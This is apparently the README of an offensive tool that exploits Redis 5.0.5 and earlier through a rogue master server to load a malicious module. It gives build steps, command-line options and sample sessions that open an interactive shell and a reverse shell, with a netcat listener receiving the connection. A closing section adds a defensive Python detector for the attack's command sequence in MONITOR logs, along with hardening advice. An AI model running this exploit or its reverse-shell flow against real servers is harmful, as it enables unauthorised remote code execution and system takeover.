# Redis Rogue Server

An exploit for Redis (<=5.0.5) RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf).

__Supports interactive shell and reverse shell!__

## Requirements

Python 3.6+

If you want to modify or recompile the redis module, you also require `make`.

## Usage

Compile the exploit module:

```bash
cd RedisModulesSDK/exp/
make
```

Copy the resulting `.so` file to the same folder as `redis-rogue-server.py`.

```
➜ ./redis-rogue-server.py -h
[ASCII-art "Redis Rogue Server" banner]
@copyright n0b0dy @ r3kapig

Usage: redis-rogue-server.py [options]

Options:
  -h, --help           show this help message and exit
  --rhost=REMOTE_HOST  target host
  --rport=REMOTE_PORT  target redis port, default 6379
  --lhost=LOCAL_HOST   rogue server ip
  --lport=LOCAL_PORT   rogue server listen port, default 21000
  --exp=EXP_FILE       Redis Module to load, default exp.so
  -v, --verbose        Show full data stream
```

## Example

### Interactive shell

```
➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1
[ASCII-art "Redis Rogue Server" banner]
@copyright n0b0dy @ r3kapig
[info] TARGET 127.0.0.1:6379
[info] SERVER 127.0.0.1:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] whoami
[>>] :n0b0dy
[<<]
```

### Reverse shell

Invoke reverse shell:

```
➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1
[ASCII-art "Redis Rogue Server" banner]
@copyright n0b0dy @ r3kapig
[info] TARGET 127.0.0.1:6379
[info] SERVER 127.0.0.1:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 127.0.0.1
Reverse server port: 9999
[info] Reverse shell payload sent.
[info] Check at 127.0.0.1:9999
[info] Unload module...
```

Receive reverse shell:

```
➜ nc -lvvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from localhost.localdomain 39312 received!
whoami
n0b0dy
```

## Thanks

* [RicterZ](https://github.com/RicterZ)'s redis exec module:
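## Detecting this technique

The `[info]` lines in the example output show the three server-side steps the tool drives on the target: setting a master, changing `dbfilename`, and loading a module. The following detector is an added example for defenders, not part of this project: it reads `redis-cli MONITOR` style lines (the line format and the constructed sample lines are assumptions) and reports any client that completed all three steps.

```python
import re
import shlex
from collections import defaultdict

# Assumed layout of one `redis-cli MONITOR` line:
#   <unix-ts> [<db> <client-ip:port>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>.*)$')

# The three stages reported by the tool's [info] lines, in the order it performs them.
STAGES = ("set_master", "set_dbfilename", "load_module")


def classify(argv):
    """Map a parsed command vector to one of STAGES, or None if it is not one of them."""
    if not argv:
        return None
    cmd = argv[0].upper()
    # SLAVEOF/REPLICAOF <host> <port> points the instance at an external master;
    # "SLAVEOF NO ONE" is the cleanup step and is deliberately not flagged.
    if cmd in ("SLAVEOF", "REPLICAOF") and len(argv) >= 3 and argv[1].upper() != "NO":
        return "set_master"
    # Changing where the RDB file is written (dbfilename or dir) at runtime.
    if cmd == "CONFIG" and len(argv) >= 3 and argv[1].upper() == "SET" \
            and argv[2].lower() in ("dbfilename", "dir"):
        return "set_dbfilename"
    if cmd == "MODULE" and len(argv) >= 2 and argv[1].upper() == "LOAD":
        return "load_module"
    return None


def find_rogue_server_chains(lines):
    """Return {client: [stages in observed order]} for clients that hit every stage."""
    seen = defaultdict(list)
    for line in lines:
        m = MONITOR_RE.match(line.strip())
        if not m:
            continue  # not a MONITOR line, skip
        try:
            argv = shlex.split(m.group("argv"))
        except ValueError:
            continue  # unbalanced quotes, skip rather than crash
        stage = classify(argv)
        if stage and stage not in seen[m.group("client")]:
            seen[m.group("client")].append(stage)
    return {c: s for c, s in seen.items() if set(s) == set(STAGES)}


# Constructed sample: one client running the full sequence, one ordinary client.
SAMPLE = [
    '1571234567.000001 [0 127.0.0.1:39312] "SLAVEOF" "127.0.0.1" "21000"',
    '1571234568.000002 [0 127.0.0.1:39312] "CONFIG" "SET" "dbfilename" "exp.so"',
    '1571234570.000003 [0 127.0.0.1:39312] "MODULE" "LOAD" "./exp.so"',
    '1571234571.000004 [0 127.0.0.1:39312] "SLAVEOF" "NO" "ONE"',
    '1571234572.000005 [0 10.0.0.5:50000] "GET" "session:abc"',
]

if __name__ == "__main__":
    print(find_rogue_server_chains(SAMPLE))
```

Running it on the constructed sample reports only `127.0.0.1:39312`, which is the sequence a rogue-server session produces; `rename-command`, `requirepass` and `protected-mode yes` in `redis.conf` are the usual ways to keep that sequence from being reachable in the first place.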